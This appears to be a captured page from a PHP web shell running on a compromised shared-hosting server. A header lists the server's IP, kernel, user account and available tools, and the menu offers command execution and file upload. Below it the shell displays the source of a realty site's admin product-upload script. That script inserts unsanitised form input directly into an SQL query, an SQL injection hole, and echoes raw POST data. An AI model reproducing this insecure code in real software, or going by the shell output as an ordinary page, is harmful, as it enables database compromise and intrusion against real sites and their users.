Server IP : 111.118.215.189 / Your IP : 52.14.3.26 Web Server : Apache System : Linux md-in-83.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : a1673wkz ( 2475) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home1/a1673wkz/propstonerealty.com/Admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php //print_r($_POST); include("config.php"); print_r($_POST); if(!empty($_FILES['image']['name']) && !empty($_POST['product_name']) && !empty($_POST['category']) && !empty($_POST['description']) && !empty($_POST['price']) && !empty($_POST['qty']) && !empty($_POST['total_item'])) { $menu=$_POST['menu']; $submenu=$_POST['submenu']; $category=serialize($_POST['category']); $product_name=$_POST['product_name']; $price=$_POST['price']; $offer=$_POST['offer']; $qty=$_POST['qty']; $des=base64_encode($_POST['description']); $t_item=$_POST['total_item']; //echo $t_item; for($cnt=0;$cnt<$t_item;$cnt++) { $image=$_FILES['image']['name'][$cnt]; $allowed = array('gif', 'png', 'jpg','jpeg','webp'); $ext = pathinfo($image, PATHINFO_EXTENSION); if (in_array($ext, $allowed)) { $tmp_image=$_FILES['image']['tmp_name'][$cnt]; $temp=explode(".", $image); $newfile=rand(00000000,99999999).'.'.end($temp); $folder="images/Products/".$newfile; $new[]=$folder; $upload=move_uploaded_file($tmp_image, $folder); } else{ echo '<p class="alert alert-danger mt-3">Image Format not Supported</p>'; } } $file=serialize($new); $query=$obj->query("INSERT INTO products(menu,submenu,category,product_name,description,price,offer,qty,image) VALUES('$menu','$submenu','$category','$product_name','$des','$price','$offer','$qty','$file')"); if($query) { echo '<a href="#" class="badge badge-success">Success</a>'; } else { echo '<a href="#" class="badge badge-success">Faild</a>'; } } else { echo '<a href="#" class="badge badge-warning">Empty Field</a>'; } // Return response //print json_encode($data); ?>